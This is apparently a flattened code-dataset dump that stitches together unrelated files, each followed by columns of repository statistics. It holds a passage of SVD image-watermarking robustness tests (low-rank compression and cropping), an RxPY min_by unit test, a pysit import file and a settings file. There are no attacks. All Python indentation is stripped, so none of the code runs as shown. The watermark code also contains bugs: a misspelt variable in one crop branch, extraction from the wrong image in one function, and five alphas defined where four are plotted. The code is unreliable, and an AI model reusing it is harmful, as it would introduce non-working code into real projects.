if save=='no':
return img_watermarked_approx
elif save=='yes':
it.save_image(img_watermarked_approx,'../out/watermarking/robustness/lowrankembedding/liutan/embedding_rank_{}_alpha_{}.png'.format(rank,scale))
def lowrank_image_jain(img, watermark, scale, rank, save):
#watermarked image
img_watermarked, watermark_vh = it.embed_watermark_jain(img, watermark, scale=scale)
img_watermarked = img_watermarked.astype(np.int32)
#applying low rank compression to watermarked image
img_watermarked_approx = it.lowrankapprox(img_watermarked,rank)
#extracting watermark using original extraction key and compressed watermarked image
watermark_extracted = it.extract_watermark_jain(img_watermarked_approx, img, watermark_vh, scale)
watermark_extracted = reversepad(watermark_extracted, watermark)
watermark_extracted = watermark_extracted.astype(np.int32)
if save=='no':
return watermark_extracted
elif save=='yes':
it.save_image(watermark_extracted,'../out/watermarking/robustness/lowrankextraction/jain/extraction_rank_{}_alpha_{}.png'.format(rank,scale))
def lowrank_watermarked_image_jain(img, watermark, scale, rank, save):
#watermarked image
img_watermarked, watermark_vh = it.embed_watermark_jain(img, watermark, scale=scale)
img_watermarked = img_watermarked.astype(np.int32)
#applying low rank compression to watermarked image
img_watermarked_approx = it.lowrankapprox(img_watermarked,rank)
img_watermarked_approx = img_watermarked_approx.astype(np.int32)
if save=='no':
return img_watermarked_approx
elif save=='yes':
it.save_image(img_watermarked_approx,'../out/watermarking/robustness/lowrankembedding/jain/embedding_rank_{}_alpha_{}.png'.format(rank,scale))
def lowrank_image_jain_mod(img, watermark, scale, rank,save):
#watermarked image
img_watermarked, watermark_vh = it.embed_watermark_jain_mod(img, watermark, scale=scale)
img_watermarked = img_watermarked.astype(np.int32)
#applying low rank compression to watermarked image
img_watermarked_approx = it.lowrankapprox(img_watermarked,rank)
#extracting watermark using original extraction key and compressed watermarked image
watermark_extracted = it.extract_watermark_jain_mod(img_watermarked, img, watermark_vh, scale=scale)
watermark_extracted = reversepad(watermark_extracted, watermark)
watermark_extracted = watermark_extracted.astype(np.int32)
if save=='no':
return watermark_extracted
elif save=='yes':
it.save_image(watermark_extracted,'../out/watermarking/robustness/lowrankextraction/jainmod/extraction_rank_{}_alpha_{}.png'.format(rank,scale))
def lowrank_watermarked_image_jain_mod(img, watermark, scale, rank,save):
#watermarked image
img_watermarked, watermark_vh = it.embed_watermark_jain_mod(img, watermark, scale=scale)
img_watermarked = img_watermarked.astype(np.int32)
#applying low rank compression to watermarked image
img_watermarked_approx = it.lowrankapprox(img_watermarked,rank)
img_watermarked_approx = img_watermarked_approx.astype(np.int32)
if save=='no':
return img_watermarked_approx
elif save=='yes':
it.save_image(img_watermarked_approx,'../out/watermarking/robustness/lowrankembedding/jainmod/embedding_rank_{}_alpha_{}.png'.format(rank,scale))
def lowrank_error_liutan(img, watermark, scale, rank):
#watermarked image
img_watermarked, watermarked_u, mat_s, watermarked_vh = it.embed_watermark(img, watermark, scale=scale)
#applying low rank compression to watermarked image
img_watermarked_approx = it.lowrankapprox(img_watermarked,rank)
#extracting watermark using original extraction key and compressed watermarked image
watermark_extracted = it.extract_watermark(img_watermarked_approx, watermarked_u, mat_s, watermarked_vh,
scale=scale)
watermark_extracted = reversepad(watermark_extracted, watermark)
#stacking extracted watermark
watermark_extracted = watermark_extracted.astype(np.float64)
watermark_extracted_rows, watermark_extracted_columns = watermark_extracted.shape[:2]
watermark_extracted_stacked = watermark_extracted.reshape(watermark_extracted_rows, -1)
#stacking original watermark
watermark = watermark.astype(np.float64)
watermark_rows, watermark_columns = watermark.shape[:2]
watermark_stacked = watermark.reshape(watermark_rows, -1)
#norm difference
error = (np.linalg.norm(watermark_extracted_stacked-watermark_stacked))/(np.linalg.norm(watermark_stacked))
return error
def lowrank_error_jain(img, watermark, scale, rank):
#watermarked image
img_watermarked, watermark_vh = it.embed_watermark_jain(img, watermark, scale=scale)
#applying low rank compression to watermarked image
img_watermarked_approx = it.lowrankapprox(img_watermarked,rank)
#extracting watermark using original extraction key and compressed watermarked image
watermark_extracted = it.extract_watermark_jain(img_watermarked_approx, img, watermark_vh, scale)
watermark_extracted = reversepad(watermark_extracted, watermark)
#stacking extracted watermark
watermark_extracted = watermark_extracted.astype(np.float64)
watermark_extracted_rows, watermark_extracted_columns = watermark_extracted.shape[:2]
watermark_extracted_stacked = watermark_extracted.reshape(watermark_extracted_rows, -1)
#stacking original watermark
watermark = watermark.astype(np.float64)
watermark_rows, watermark_columns = watermark.shape[:2]
watermark_stacked = watermark.reshape(watermark_rows, -1)
#norm difference
error = (np.linalg.norm(watermark_extracted_stacked-watermark_stacked))/(np.linalg.norm(watermark_stacked))
return error
def lowrank_error_jain_mod(img, watermark, scale, rank):
#watermarked image
img_watermarked, watermark_vh = it.embed_watermark_jain_mod(img, watermark, scale=scale)
#applying low rank compression to watermarked image
img_watermarked_approx = it.lowrankapprox(img_watermarked,rank)
#extracting watermark using original extraction key and compressed watermarked image
watermark_extracted = it.extract_watermark_jain_mod(img_watermarked_approx, img, watermark_vh, scale=scale)
watermark_extracted = reversepad(watermark_extracted, watermark)
#stacking extracted watermark
watermark_extracted = watermark_extracted.astype(np.float64)
watermark_extracted_rows, watermark_extracted_columns = watermark_extracted.shape[:2]
watermark_extracted_stacked = watermark_extracted.reshape(watermark_extracted_rows, -1)
#stacking original watermark
watermark = watermark.astype(np.float64)
watermark_rows, watermark_columns = watermark.shape[:2]
watermark_stacked = watermark.reshape(watermark_rows, -1)
#norm difference
error = (np.linalg.norm(watermark_extracted_stacked-watermark_stacked))/(np.linalg.norm(watermark_stacked))
return error
def lowrank_extractionerror_plot_liutan(img,watermark):
alphas = (0.05,0.1,0.5,0.75)
ranks = np.arange(1,300)
errors0 = []
for rank in ranks:
error0 = lowrank_error_liutan(img,watermark,alphas[0],rank)
errors0.append(error0)
print("liutan",rank)
errors1 = []
for rank in ranks:
error1 = lowrank_error_liutan(img,watermark,alphas[1],rank)
errors1.append(error1)
print("liutan",rank)
errors2 = []
for rank in ranks:
error2 = lowrank_error_liutan(img,watermark,alphas[2],rank)
errors2.append(error2)
print("liutan",rank)
errors3 = []
for rank in ranks:
error3 = lowrank_error_liutan(img,watermark,alphas[3],rank)
errors3.append(error3)
print("liutan",rank)
plt.plot(errors0,label="a = {0}".format(alphas[0]))
plt.plot(errors1,label="a = {0}".format(alphas[1]))
plt.plot(errors2,label="a = {0}".format(alphas[2]))
plt.plot(errors3,label="a = {0}".format(alphas[3]))
plt.xlabel('Rank')
plt.ylabel('Error')
plt.legend()
plt.savefig('../out/watermarking/plots/lowrankcompression/liutan/lowrank_extractionerror_liutan.eps',bbox_inches='tight')
def lowrank_extractionerror_plot_jain(img,watermark):
alphas = (0.05,0.1,0.5,0.75)
ranks = np.arange(1,300)
errors0 = []
for rank in ranks:
error0 = lowrank_error_jain(img,watermark,alphas[0],rank)
errors0.append(error0)
print("jain",rank)
errors1 = []
for rank in ranks:
error1 = lowrank_error_jain(img,watermark,alphas[1],rank)
errors1.append(error1)
print("jain",rank)
errors2 = []
for rank in ranks:
error2 = lowrank_error_jain(img,watermark,alphas[2],rank)
errors2.append(error2)
print("jain",rank)
errors3 = []
for rank in ranks:
error3 = lowrank_error_jain(img,watermark,alphas[3],rank)
errors3.append(error3)
print("jain",rank)
plt.plot(errors0,label="a = {0}".format(alphas[0]))
plt.plot(errors1,label="a = {0}".format(alphas[1]))
plt.plot(errors2,label="a = {0}".format(alphas[2]))
plt.plot(errors3,label="a = {0}".format(alphas[3]))
plt.xlabel('Rank')
plt.ylabel('Error')
plt.legend()
plt.savefig('../out/watermarking/plots/lowrankcompression/jain/lowrank_extractionerror_jain.eps',bbox_inches='tight')
def lowrank_extractionerror_plot_jain_mod(img,watermark):
alphas = (0.05,0.1,0.25,0.5,0.75)
ranks = np.arange(1,300)
errors0 = []
for rank in ranks:
error0 = lowrank_error_jain_mod(img,watermark,alphas[0],rank)
errors0.append(error0)
print("jain mod",rank)
errors1 = []
for rank in ranks:
error1 = lowrank_error_jain_mod(img,watermark,alphas[1],rank)
errors1.append(error1)
print("jain mod",rank)
errors2 = []
for rank in ranks:
error2 = lowrank_error_jain_mod(img,watermark,alphas[2],rank)
errors2.append(error2)
print("jain mod",rank)
errors3 = []
for rank in ranks:
error3 = lowrank_error_jain_mod(img,watermark,alphas[3],rank)
errors3.append(error3)
print("jain mod",rank)
plt.plot(errors0,label="a = {0}".format(alphas[0]))
plt.plot(errors1,label="a = {0}".format(alphas[1]))
plt.plot(errors2,label="a = {0}".format(alphas[2]))
plt.plot(errors3,label="a = {0}".format(alphas[3]))
plt.xlabel('Rank')
plt.ylabel('Error')
plt.legend()
plt.savefig('../out/watermarking/plots/lowrankcompression/jainmod/lowrank_extractionerror_jain_mod.eps',bbox_inches='tight')
#cropping tests
def crop_left(img, number):
img = img[:,number:,:]
return img
def crop_right(img, number):
img = img[:,:-number,:]
return img
def crop_bottom(img, number):
img = img[:-number,:,:]
return img
def crop_top(img, number):
img = img[number:,:,:]
return img
def crop_image_liutan(img, watermark, scale, number, side):
img_watermarked, watermarked_u, mat_s, watermarked_vh = it.embed_watermark(img, watermark, scale=scale)
img_watermarked = img_watermarked.astype(np.int32)
img_rows, img_columns = img.shape[:2]
img_stacked = img.reshape(img_rows, -1)
#img_stacked = img_stacked.astype(np.int32)
if side == 'left':
cropped_watermarked_image = crop_left(img_watermarked, number)
cropped_watermarked_image = it.padimage3d(img, cropped_watermarked_image)
cropped_watermarked_image_padded = cropped_watermarked_image.astype(np.int32)
elif side == 'right':
cropped_watermarked_image = crop_right(img_watermarked, number)
cropped_watermarked_image = it.padimage3d(img, cropped_watermarked_image)
cropped_watermarked_image_padded = cropped_watermarked_image.astype(np.int32)
elif side == 'bottom':
cropped_watermarked_image = crop_bottom(img_watermarked, number)
cropped_watermarked_image = it.padimage3d(img, cropped_watermarked_image)
cropped_watermarked_image_padded = cropped_watermarked_image.astype(np.int32)
elif side == 'top':
cropped_watermarked_image = crop_top(img_watermarked, number)
cropped_watermarked_image = it.padimage3d(img, cropped_watermarked_image)
cropped_watermarked_image_padded = cropped_watermarked_image.astype(np.int32)
it.save_image(cropped_watermarked_image_padded,'../out/watermarking/cropping/embedding/liutan/embedding_alpha_{}_cropped_{}_from_{}.png'.format(scale, number,side))
def crop_extract_watermark_liutan(img, watermark, scale, number, side):
img_watermarked, watermarked_u, mat_s, watermarked_vh = it.embed_watermark(img, watermark, scale=scale)
img_watermarked = img_watermarked.astype(np.int32)
img_rows, img_columns = img.shape[:2]
img_stacked = img.reshape(img_rows, -1)
#img_stacked = img_stacked.astype(np.int32)
if side == 'left':
cropped_watermarked_image = crop_left(img_watermarked, number)
elif side == 'right':
cropped_watermarked_image = crop_right(img_watermarked, number)
elif side == 'bottom':
cropped_watermarked_image = crop_bottom(img_watermarked, number)
elif side == 'top':
cropped_watermarked_image = crop_top(img_watermarked, number)
cropped_watermarked_image = it.padimage3d(img, cropped_watermarked_image)
cropped_watermarked_image_padded = cropped_watermarked_image.astype(np.int32)
watermark_extracted = it.extract_watermark(cropped_watermarked_image_padded, watermarked_u, mat_s, watermarked_vh,
scale=scale)
watermark_extracted_final = reversepad(watermark_extracted, watermark)
watermark_extracted_final = watermark_extracted_final.astype(np.int32)
it.save_image(watermark_extracted_final,'../out/watermarking/cropping/extracting/liutan/extracted_watermark_alpha_{}_cropped_{}_from_{}.png'.format(scale, number,side))
def crop_image_jain(img, watermark, scale, number, side):
img_watermarked, watermark_vh = it.embed_watermark_jain(img, watermark, scale=scale)
img_watermarked = img_watermarked.astype(np.int32)
img_rows, img_columns = img.shape[:2]
img_stacked = img.reshape(img_rows, -1)
#img_stacked = img_stacked.astype(np.int32)
if side == 'left':
cropped_watermarked_image = crop_left(img_watermarked, number)
cropped_watermarked_image = it.padimage3d(img, cropped_watermarked_image)
cropped_watermarked_image_padded = cropped_watermarked_image.astype(np.int32)
elif side == 'right':
cropped_watermarked_image = crop_right(img_watermarked, number)
cropped_watermarked_image = it.padimage3d(img, cropped_watermarked_image)
cropped_watermarked_image_padded = cropped_watermarked_image.astype(np.int32)
elif side == 'bottom':
cropped_watermarked_image = crop_bottom(img_watermarked, number)
cropped_watermarked_image = it.padimage3d(img, cropped_watermarked_image)
cropped_watermarked_image_padded = cropped_watermarked_image.astype(np.int32)
elif side == 'top':
cropped_watermarked_image = crop_top(img_watermarked, number)
cropped_watermarked_image = it.padimage3d(img, cropped_watermarked_image)
cropped_watermarked_image_padded = cropped_watermarked_image.astype(np.int32)
it.save_image(cropped_watermarked_image_padded,'../out/watermarking/cropping/embedding/jain/embedding_alpha_{}_cropped_{}_from_{}.png'.format(scale, number,side))
def crop_extract_watermark_jain(img, watermark, scale, number, side):
img_watermarked, watermark_vh = it.embed_watermark_jain(img, watermark, scale=scale)
img_watermarked = img_watermarked.astype(np.int32)
img_rows, img_columns = img.shape[:2]
img_stacked = img.reshape(img_rows, -1)
#img_stacked = img_stacked.astype(np.int32)
if side == 'left':
cropped_watermarked_image = crop_left(img_watermarked, number)
elif side == 'right':
cropped_watermarked_image = crop_right(img_watermarked, number)
elif side == 'bottom':
cropped_watermarked_image = crop_bottom(img_watermarked, number)
elif side == 'top':
cropped_watermarked_image = crop_top(img_watermarked, number)
cropped_watermarked_image = it.padimage3d(img, cropped_watermarked_image)
cropped_watermarked_image_padded = cropped_watermarked_image.astype(np.int32)
watermark_extracted = it.extract_watermark_jain(cropped_watermarked_image_padded, img, watermark_vh, scale)
watermark_extracted_final = reversepad(watermark_extracted, watermark)
watermark_extracted_final = watermark_extracted_final.astype(np.int32)
it.save_image(watermark_extracted_final,'../out/watermarking/cropping/extracting/jain/extracted_watermark_alpha_{}_cropped_{}_from_{}.png'.format(scale, number,side))
def crop_image_jain_mod(img, watermark, scale, number, side):
img_watermarked, watermark_vh = it.embed_watermark_jain_mod(img, watermark, scale=scale)
img_watermarked = img_watermarked.astype(np.int32)
img_rows, img_columns = img.shape[:2]
img_stacked = img.reshape(img_rows, -1)
#img_stacked = img_stacked.astype(np.int32)
if side == 'left':
cropped_watermarked_image = crop_left(img_watermarked, number)
cropped_watermarked_image = it.padimage3d(img, cropped_watermarked_image)
cropped_watermarked_image_padded = cropped_watermarked_image.astype(np.int32)
elif side == 'right':
cropped_watermarked_image = crop_right(img_watermarked, number)
cropped_watermarked_image = it.padimage3d(img, cropped_watermarked_image)
cropped_watermarked_image_padded = cropped_watermarked_image.astype(np.int32)
elif side == 'bottom':
cropped_watermarked_image = crop_bottom(img_watermarked, number)
cropped_watermarked_image = it.padimage3d(img, cropped_watermarked_image)
cropped_watermarked_image_padded = cropped_watermarked_image.astype(np.int32)
elif side == 'top':
cropped_watermarked_image = crop_top(img_watermarked, number)
cropped_watermarked_image = it.padimage3d(img, cropped_watermarked_image)
cropped_watermarked_image_padded = cropped_watermarked_image.astype(np.int32)
it.save_image(cropped_watermarked_image_padded,'../out/watermarking/cropping/embedding/jainmod/embedding_alpha_{}_cropped_{}_from_{}.png'.format(scale, number,side))
def crop_extract_watermark_jain_mod(img, watermark, scale, number, side):
img_watermarked, watermark_vh = it.embed_watermark_jain_mod(img, watermark, scale=scale)
img_watermarked = img_watermarked.astype(np.int32)
img_rows, img_columns = img.shape[:2]
img_stacked = img.reshape(img_rows, -1)
#img_stacked = img_stacked.astype(np.int32)
if side == 'left':
croppedwatermarked_image = crop_left(img_watermarked, number)
elif side == 'right':
cropped_watermarked_image = crop_right(img_watermarked, number)
elif side == 'bottom':
cropped_watermarked_image = crop_bottom(img_watermarked, number)
elif side == 'top':
cropped_watermarked_image = crop_top(img_watermarked, number)
cropped_watermarked_image = it.padimage3d(img, cropped_watermarked_image)
cropped_watermarked_image_padded = cropped_watermarked_image.astype(np.int32)
watermark_extracted = it.extract_watermark_jain_mod(cropped_watermarked_image_padded, img, watermark_vh, scale)
watermark_extracted_final = reversepad(watermark_extracted, watermark)
watermark_extracted_final = watermark_extracted_final.astype(np.int32)
it.save_image( watermark_extracted_final,'../out/watermarking/cropping/extracting/jainmod/extracted_watermark_alpha_{}_cropped_{}_from_{}.png'.format(scale, number,side))
| 47.536776
| 174
| 0.739992
| 3,755
| 30,376
| 5.713715
| 0.050067
| 0.098532
| 0.095409
| 0.020135
| 0.928082
| 0.921417
| 0.911536
| 0.901095
| 0.896667
| 0.856351
| 0
| 0.013395
| 0.159468
| 30,376
| 638
| 175
| 47.611285
| 0.826923
| 0.102811
| 0
| 0.755889
| 0
| 0
| 0.089049
| 0.073668
| 0
| 0
| 0
| 0
| 0
| 1
| 0.077088
| false
| 0
| 0.021413
| 0
| 0.149893
| 0.03212
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
71cc963c376905849b4bed61c98ac2638f98c3c3
| 10,728
|
py
|
Python
|
tests/test_observable/test_minby.py
|
mmpio/RxPY
|
4ed60bb5c04aa85de5210e5537a6adfe1b667d50
|
[
"MIT"
] | 4,342
|
2015-01-06T09:00:23.000Z
|
2022-03-28T15:05:50.000Z
|
tests/test_observable/test_minby.py
|
mmpio/RxPY
|
4ed60bb5c04aa85de5210e5537a6adfe1b667d50
|
[
"MIT"
] | 613
|
2015-01-07T20:44:56.000Z
|
2022-03-20T06:14:20.000Z
|
tests/test_observable/test_minby.py
|
mmpio/RxPY
|
4ed60bb5c04aa85de5210e5537a6adfe1b667d50
|
[
"MIT"
] | 420
|
2015-01-07T14:30:30.000Z
|
2022-03-11T22:47:46.000Z
|
import unittest
from rx import operators as ops
from rx.testing import TestScheduler, ReactiveTest
on_next = ReactiveTest.on_next
on_completed = ReactiveTest.on_completed
on_error = ReactiveTest.on_error
subscribe = ReactiveTest.subscribe
subscribed = ReactiveTest.subscribed
disposed = ReactiveTest.disposed
created = ReactiveTest.created
class RxException(Exception):
pass
# Helper function for raising exceptions within lambdas
def _raise(ex):
raise RxException(ex)
class TestMinBy(unittest.TestCase):
def test_min_by_empty(self):
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(
on_next(150, {"key": 1, "value": 'z'}), on_completed(250))
def create():
return xs.pipe(ops.min_by(lambda x: x["key"]))
res = scheduler.start(create=create).messages
assert(2 == len(res))
assert(0 == len(res[0].value.value))
assert(res[1].value.kind == 'C' and res[1].time == 250)
def test_min_by_return(self):
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(
on_next(150, {"key": 1, "value": 'z'}),
on_next(210, {"key": 2, "value": 'a'}),
on_completed(250))
def create():
return xs.pipe(ops.min_by(lambda x: x["key"]))
res = scheduler.start(create=create).messages
self.assertEqual(2, len(res))
assert(res[0].value.kind == 'N')
self.assertEqual(1, len(res[0].value.value))
self.assertEqual(2, res[0].value.value[0]["key"])
self.assertEqual('a', res[0].value.value[0]["value"])
assert(res[1].value.kind == 'C' and res[1].time == 250)
def test_min_by_some(self):
scheduler = TestScheduler()
msgs = [
on_next(150, {
"key": 1,
"value": 'z'
}), on_next(210, {
"key": 3,
"value": 'b'
}), on_next(220, {
"key": 2,
"value": 'c'
}), on_next(230, {
"key": 4,
"value": 'a'
}), on_completed(250)
]
xs = scheduler.create_hot_observable(msgs)
def create():
return xs.pipe(ops.min_by(lambda x: x["key"]))
res = scheduler.start(create=create).messages
self.assertEqual(2, len(res))
assert(res[0].value.kind == 'N')
self.assertEqual(1, len(res[0].value.value))
self.assertEqual(2, res[0].value.value[0]["key"])
self.assertEqual('c', res[0].value.value[0]["value"])
assert(res[1].value.kind == 'C' and res[1].time == 250)
def test_min_by_multiple(self):
scheduler = TestScheduler()
msgs = [
on_next(150, {
"key": 1,
"value": 'z'
}), on_next(210, {
"key": 3,
"value": 'b'
}), on_next(215, {
"key": 2,
"value": 'd'
}), on_next(220, {
"key": 3,
"value": 'c'
}), on_next(225, {
"key": 2,
"value": 'y'
}), on_next(230, {
"key": 4,
"value": 'a'
}), on_next(235, {
"key": 4,
"value": 'r'
}), on_completed(250)
]
xs = scheduler.create_hot_observable(msgs)
def create():
return xs.pipe(ops.min_by(lambda x: x["key"]))
res = scheduler.start(create=create).messages
self.assertEqual(2, len(res))
assert(res[0].value.kind == 'N')
self.assertEqual(2, len(res[0].value.value))
self.assertEqual(2, res[0].value.value[0]["key"])
self.assertEqual('d', res[0].value.value[0]["value"])
self.assertEqual(2, res[0].value.value[1]["key"])
self.assertEqual('y', res[0].value.value[1]["value"])
assert(res[1].value.kind == 'C' and res[1].time == 250)
def test_min_by_on_error(self):
ex = 'ex'
scheduler = TestScheduler()
msgs = [
on_next(150, {
"key": 1,
"value": 'z'
}), on_error(210, ex)
]
xs = scheduler.create_hot_observable(msgs)
def create():
return xs.pipe(ops.min_by(lambda x: x["key"]))
res = scheduler.start(create=create).messages
assert res == [on_error(210, ex)]
def test_min_by_never(self):
scheduler = TestScheduler()
msgs = [
on_next(150, {
"key": 1,
"value": 'z'
})
]
xs = scheduler.create_hot_observable(msgs)
def create():
return xs.pipe(ops.min_by(lambda x: x["key"]))
res = scheduler.start(create=create).messages
assert res == []
def test_min_by_comparer_empty(self):
scheduler = TestScheduler()
msgs = [
on_next(150, {
"key": 1,
"value": 'z'
}), on_completed(250)
]
def reverse_comparer(a, b):
if a > b:
return -1
if a == b:
return 0
return 1
xs = scheduler.create_hot_observable(msgs)
def create():
return xs.pipe(ops.min_by(lambda x: x["key"], reverse_comparer))
res = scheduler.start(create=create).messages
self.assertEqual(2, len(res))
self.assertEqual(0, len(res[0].value.value))
assert(res[1].value.kind == 'C' and res[1].time == 250)
def test_min_by_comparer_return(self):
scheduler = TestScheduler()
msgs = [
on_next(150, {
"key": 1,
"value": 'z'
}), on_next(210, {
"key": 2,
"value": 'a'
}), on_completed(250)
]
def reverse_comparer(a, b):
if a > b:
return -1
if a == b:
return 0
return 1
xs = scheduler.create_hot_observable(msgs)
def create():
return xs.pipe(ops.min_by(lambda x: x["key"], reverse_comparer))
res = scheduler.start(create=create).messages
self.assertEqual(2, len(res))
assert(res[0].value.kind == 'N')
self.assertEqual(1, len(res[0].value.value))
self.assertEqual(2, res[0].value.value[0]["key"])
self.assertEqual('a', res[0].value.value[0]["value"])
assert(res[1].value.kind == 'C' and res[1].time == 250)
def test_min_by_comparer_some(self):
scheduler = TestScheduler()
msgs = [
on_next(150, {
"key": 1,
"value": 'z'
}), on_next(210, {
"key": 3,
"value": 'b'
}), on_next(220, {
"key": 20,
"value": 'c'
}), on_next(230, {
"key": 4,
"value": 'a'
}), on_completed(250)
]
def reverse_comparer(a, b):
if a > b:
return -1
if a == b:
return 0
return 1
xs = scheduler.create_hot_observable(msgs)
def create():
return xs.pipe(ops.min_by(lambda x: x["key"], reverse_comparer))
res = scheduler.start(create=create).messages
self.assertEqual(2, len(res))
assert(res[0].value.kind == 'N')
self.assertEqual(1, len(res[0].value.value))
self.assertEqual(20, res[0].value.value[0]["key"])
self.assertEqual('c', res[0].value.value[0]["value"])
assert(res[1].value.kind == 'C' and res[1].time == 250)
def test_min_by_comparer_on_error(self):
ex = 'ex'
scheduler = TestScheduler()
msgs = [
on_next(150, {
"key": 1,
"value": 'z'
}), on_error(210, ex)
]
def reverse_comparer(a, b):
if a > b:
return -1
if a == b:
return 0
return 1
def create():
return xs.pipe(ops.min_by(lambda x: x["key"], reverse_comparer))
xs = scheduler.create_hot_observable(msgs)
res = scheduler.start(create=create).messages
assert res == [on_error(210, ex)]
def test_min_by_comparer_never(self):
scheduler = TestScheduler()
msgs = [
on_next(150, {
"key": 1,
"value": 'z'
})
]
def reverse_comparer(a, b):
if a > b:
return -1
if a == b:
return 0
return 1
xs = scheduler.create_hot_observable(msgs)
def create():
return xs.pipe(ops.min_by(lambda x: x["key"], reverse_comparer))
res = scheduler.start(create=create).messages
assert res == []
def test_min_by_mapper_throws(self):
ex = 'ex'
scheduler = TestScheduler()
msgs = [
on_next(150, {
"key": 1,
"value": 'z'
}), on_next(210, {
"key": 3,
"value": 'b'
}), on_next(220, {
"key": 2,
"value": 'c'
}), on_next(230, {
"key": 4,
"value": 'a'
}), on_completed(250)
]
def reverse_comparer(a, b):
if a > b:
return -1
if a == b:
return 0
return 1
xs = scheduler.create_hot_observable(msgs)
def create():
return xs.pipe(ops.min_by(lambda x: _raise(ex), reverse_comparer))
res = scheduler.start(create=create).messages
assert res == [on_error(210, ex)]
def test_min_by_comparer_throws(self):
ex = 'ex'
scheduler = TestScheduler()
msgs = [
on_next(150, {
"key": 1,
"value": 'z'
}), on_next(210, {
"key": 3,
"value": 'b'
}), on_next(220, {
"key": 2,
"value": 'c'
}), on_next(230, {
"key": 4,
"value": 'a'
}), on_completed(250)
]
def reverse_comparer(a, b):
_raise(ex)
xs = scheduler.create_hot_observable(msgs)
def create():
return xs.pipe(ops.min_by(lambda x: x["key"], reverse_comparer))
res = scheduler.start(create=create).messages
assert res == [on_error(220, ex)]
| 28.531915
| 78
| 0.478001
| 1,225
| 10,728
| 4.057143
| 0.073469
| 0.042254
| 0.043461
| 0.053521
| 0.878672
| 0.873642
| 0.863783
| 0.863783
| 0.852515
| 0.852515
| 0
| 0.043224
| 0.378915
| 10,728
| 375
| 79
| 28.608
| 0.702686
| 0.00494
| 0
| 0.800654
| 0
| 0
| 0.038134
| 0
| 0
| 0
| 0
| 0
| 0.143791
| 1
| 0.111111
| false
| 0.003268
| 0.009804
| 0.042484
| 0.228758
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
71e146003a2943e78db3d29b24ca3cfddc536f53
| 173
|
py
|
Python
|
pysit/optimization/__init__.py
|
zfang-slim/pysit
|
8fca42b9749841abc302d1f8195a1437fad7ae4d
|
[
"BSD-3-Clause"
] | 64
|
2015-09-08T06:23:27.000Z
|
2022-03-09T23:35:24.000Z
|
pysit/optimization/__init__.py
|
zfang-slim/pysit
|
8fca42b9749841abc302d1f8195a1437fad7ae4d
|
[
"BSD-3-Clause"
] | 23
|
2015-10-08T01:14:24.000Z
|
2021-07-15T11:37:05.000Z
|
pysit/optimization/__init__.py
|
zfang-slim/pysit
|
8fca42b9749841abc302d1f8195a1437fad7ae4d
|
[
"BSD-3-Clause"
] | 48
|
2015-06-25T14:48:22.000Z
|
2021-12-06T19:50:25.000Z
|
from pysit.optimization.gradient_descent import *
from pysit.optimization.lbfgs import *
from pysit.optimization.cg import *
from pysit.optimization.gauss_newton import *
| 24.714286
| 49
| 0.82659
| 22
| 173
| 6.409091
| 0.454545
| 0.255319
| 0.595745
| 0.574468
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104046
| 173
| 6
| 50
| 28.833333
| 0.909677
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
71e16d0133673cf14f2748901dab066e8ac6ae2e
| 167
|
py
|
Python
|
settings/channel_archiver/NIH.XRAY_SCOPE_settings.py
|
bopopescu/Lauecollect
|
60ae2b05ea8596ba0decf426e37aeaca0bc8b6be
|
[
"MIT"
] | null | null | null |
settings/channel_archiver/NIH.XRAY_SCOPE_settings.py
|
bopopescu/Lauecollect
|
60ae2b05ea8596ba0decf426e37aeaca0bc8b6be
|
[
"MIT"
] | 1
|
2019-10-22T21:28:31.000Z
|
2019-10-22T21:39:12.000Z
|
settings/channel_archiver/NIH.XRAY_SCOPE_settings.py
|
bopopescu/Lauecollect
|
60ae2b05ea8596ba0decf426e37aeaca0bc8b6be
|
[
"MIT"
] | 2
|
2019-06-06T15:06:46.000Z
|
2020-07-20T02:03:22.000Z
|
P3.filename = '//mx340hs/data/anfinrud_1906/Archive/NIH.XRAY_SCOPE.P3.txt'
TRACE_COUNT.filename = '//mx340hs/data/anfinrud_1906/Archive/NIH.XRAY_SCOPE.TRACE_COUNT.txt'
| 83.5
| 92
| 0.814371
| 26
| 167
| 5
| 0.5
| 0.230769
| 0.292308
| 0.415385
| 0.769231
| 0.769231
| 0.769231
| 0.769231
| 0.769231
| 0
| 0
| 0.098765
| 0.02994
| 167
| 2
| 92
| 83.5
| 0.703704
| 0
| 0
| 0
| 0
| 0
| 0.744048
| 0.744048
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
e0b54317b7693ecfe98ed92da93541ca01d55722
| 52,657
|
py
|
Python
|
test/integration/component/test_eip_elb.py
|
Codegass/cloudstack
|
71056191f2bdad4be1a7eaf9bb73a7dcee3516f2
|
[
"Apache-2.0"
] | 1,131
|
2015-01-08T18:59:06.000Z
|
2022-03-29T11:31:10.000Z
|
test/integration/component/test_eip_elb.py
|
Codegass/cloudstack
|
71056191f2bdad4be1a7eaf9bb73a7dcee3516f2
|
[
"Apache-2.0"
] | 5,908
|
